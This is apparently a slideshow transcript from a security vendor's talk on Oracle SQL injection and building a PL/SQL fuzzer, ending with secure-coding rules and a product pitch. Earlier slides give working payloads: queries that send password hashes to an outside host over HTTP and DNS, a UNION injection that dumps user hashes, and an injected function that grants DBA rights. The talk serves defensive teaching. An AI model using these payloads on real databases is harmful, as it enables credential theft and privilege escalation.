  • 7. SQL Injection Out-of-band Send information via HTTP to an external site via HTTPURI select HTTPURITYPE( 'http://www.sentrigo.com/'|| (select password from dba_users where rownum=1) ).getclob() from dual; Send information via HTTP to an external site via utl_http select utl_http.request ('http://www.sentrigo.com/'|| (select password from dba_users where rownum=1)) from dual; Send information via DNS (max. 64 bytes) to an external site select utl_http.request ('http://www.'||(select password from dba_users where rownum=1)||'.sentrigo.com/' ) from dual; DNS-Request: www.8A8F025737A9097A.sentrigo.com
  • 8. Blind SQL Injection Pseudo-Code: If the first character of the sys-hashkey is a 'A' then select count(*) from all_objects,all_objects else select count(*) from dual end if;
  • 9. SQL Injection – Web Application  Username = ' or 1=1 -- The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + '''' The result = select * from users where username = '' or 1=1 --' and password = ''
  • 10. SQL Injection – Demo Procedure CREATE OR REPLACE PROCEDURE LIST_TABLES(p_owner VARCHAR2) IS TYPE c_type IS REF CURSOR; l_cv c_type; l_buff VARCHAR2(100); BEGIN dbms_output.enable(100000); OPEN l_cv FOR 'SELECT object_name FROM all_objects WHERE owner = ''' || p_owner || ''' AND object_type = ''TABLE'''; LOOP FETCH l_cv INTO l_buff; dbms_output.put_line(l_buff); EXIT WHEN l_cv%NOTFOUND; END LOOP; CLOSE l_cv; END; /
  • 11. SQL Injection – Inject SQL SQL> set serveroutput on SQL> exec list_tables('SCOTT') DEPT EMP BONUS SALGRADE SALGRADE SQL> exec list_tables('KUKU'' UNION SELECT username || '':'' || password FROM dba_users--') BI:FA1D2B85B70213F3 CTXSYS:71E687F036AD56E5 DBSNMP:0B813E8C027CA786 …
  • 12. SQL Injection – Inject Functions CREATE OR REPLACE FUNCTION get_dba RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; RETURN 'Hacked'; END get_dba; /
  • 13. SQL Injection – Inject Functions SQL> exec sys.list_tables('NOUSER'' || scott.get_dba()--') PL/SQL procedure successfully completed. SQL> @privs Roles for current user USERNAME GRANTED_ROLE ------------------------------ ------------ SCOTT CONNECT SCOTT DBA SCOTT RESOURCE
  • 14. Fuzzing Fuzz testing or fuzzing is a software testing technique that provides random data ("fuzz") to the inputs of a program. If the program fails (for example, by crashing, or by failing built-in code assertions), the defects can be noted. The great advantage of fuzz testing is that the test design is extremely simple, and free of preconceptions about system behavior.
  • 15. Finding Vulnerable Code  Finding dynamic query code select * from dba_dependencies where referenced_name = 'DBMS_SQL' select * from dba_source where upper(text) like '%IMMEDIATE%'  Finding sysdate select * from dba_source where upper(text) like '%||%SYSDATE%'
  • 16. PL/SQL – The Right Tool  Easy to run SQL  Built-in the database  Cross platform  Good enough for the task  DBAs already speak it fluently  Can be easily scheduled as a DB job
  • 17. Caution – Use With Care  Fuzzing on production is a big no-no  Be sure to receive permission from the DB owner
  • 18. Design  Track – using tables • Track fuzzing results • Rerun, Restart tests after stoping and failing  Discovery • Code to find interesting stored program units  Invoke • Invocation code to invoke stored procedures with different edge-case parameters  Wrap • Tie it up in a loop and wrap in a package  Report • Report findings
  • 19. Discovery – Find Relevant Objects
  • 20. Discovery – Find Interesting Ones
  • 21. Discovery – Find Interesting Ones
  • 22. Discovery – Placing Data In Tables  Use dbms_describe for PL/SQL  Find 'Language Java' in code and then use dbms_describe on the PL/SQL wrapper  Save the data for future re-runs
  • 23. Invoke Fuzzed Code  Use "execute immediate" to invoke anonymous PL/SQL blocks created from dbms_describe  Pass in various interesting input parameters • Strings containing ' or " • Long strings • Nulls • Combinations  On code using concatenation of numbers and dates directly without formating • NLS_DATE_FORMAT • NLS_NUMERIC_CHARACTERS
  • 24. Invoking Fuzzed Code  Catch interesting errors • ORA-00921: unexpected end of SQL command • ORA-00936: missing expression • ORA-00933: SQL command not properly ended • Crashes – for C code • etc.
  • 28. Bombs Away  Running as DBA on Oracle supplied code can be very interesting  Sentrigo Red Team discovered multiple vulnerabilities this way • Reported to Oracle • Protected by Hedgehog out of the box
  • 29. Other Fuzzers Out There  Inguma PL/SQL fuzzer • Written by Joxean Koret • Python • http://inguma.sourceforge.net/  SPIKE • Not Oracle specific • Used to analyze and fuzz network protocols • http://www.immunityinc.com/resources- freesoftware.shtml
  • 30. Write Secure Code  The least privilege principle • Lock down packages  System access, file access, network access  Use secure coding techniques • Bind variables • input validation • Clear ownership of security issues
  • 31. Some Coding Rules  Avoid hardcoding username/password  Wrap sensitive/important program code – even if not really safe  Use full qualified names for function and procedure calls (e.g. SYS.DBMS_ASSERT)  Always validate user/database input  Be careful with dynamic statements (Cursors, SQL- Statements, …)  Be careful with file access  Be careful with OS command execution
  • 32. Protecting Your Database  Try out the Hedgehog - http://www.sentrigo.com • Virtual patching • SQL Injection protection • Fine grain auditing • Centralized management • More…